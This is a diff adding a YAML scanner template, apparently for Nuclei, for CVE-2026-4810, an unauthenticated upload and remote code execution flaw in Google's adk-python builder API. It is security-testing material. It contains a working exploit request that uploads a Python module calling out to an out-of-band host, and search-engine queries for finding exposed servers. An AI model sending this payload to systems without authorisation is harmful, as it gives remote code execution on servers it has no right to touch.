diff --git a/http/cves/2026/CVE-2026-4810.yaml b/http/cves/2026/CVE-2026-4810.yaml
new file mode 100644
index 000000000000..a6bf3cf8e7e7
--- /dev/null
+++ b/http/cves/2026/CVE-2026-4810.yaml
@@ -0,0 +1,76 @@
+id: CVE-2026-4810
+
+info:
+  name: Google ADK-Python - Unauthenticated Builder Endpoint (Pre-RCE)
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Google Agent Development Kit for Python (adk-python) versions 1.7.0 through 1.28.1
+    (and 2.0.0a1 through 2.0.0a2) expose unauthenticated builder API endpoints that
+    accept arbitrary file uploads, including Python modules. Combined with unvalidated
+    dynamic imports in the agent loading pipeline (importlib.import_module), this allows
+    unauthenticated remote code execution.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary code on the server, leading to full system compromise.
+  remediation: |
+    Upgrade to versions 1.28.1 and 2.0.0a2 or later and redeploy to production and local environments.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-4810
+    - https://github.com/google/adk-python/blob/main/CHANGELOG.md
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/U:Amber
+    cvss-score: 9.3
+    cve-id: CVE-2026-4810
+    cwe-id: CWE-306,CWE-94
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: google
+    product: adk-python
+    shodan-query: title:"ADK" http.component:"uvicorn"
+    fofa-query: body="ADK" && header="uvicorn"
+  tags: cve,cve2026,adk,google,rce,unauth,code-injection
+
+variables:
+  multipart_boundary: "{{md5(date_time('2006-01-02T15:04:05Z07:00'))}}"
+  agent_name: "{{rand_text_alpha(1)}}{{rand_text_alpha(7)}}"
+  rand_instruction: "{{rand_base(12)}}"
+
+http:
+  - raw:
+      - |
+        POST /builder/save HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate, zstd
+        Accept: */*
+        Connection: keep-alive
+        Content-Type: multipart/form-data; boundary={{multipart_boundary}}
+
+        --{{multipart_boundary}}
+        Content-Disposition: form-data; name="files"; filename="{{agent_name}}/agent.py"
+        Content-Type: text/x-python
+
+        import requests
+        response = requests.get("http://{{interactsh-url}}")
+        print(response.text)
+        from google.adk.agents import Agent
+        root_agent = Agent(name="{{agent_name}}", model="gemini-2.0-flash", instruction="{{rand_instruction}}")
+
+        --{{multipart_boundary}}--
+      - |
+        GET /list-apps?detailed=true HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code_1 == 200 && body_1 == "true"
+          - status_code_2 == 200 && contains(body_2, concat("\"", agent_name, "\""))
+        condition: and
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - dns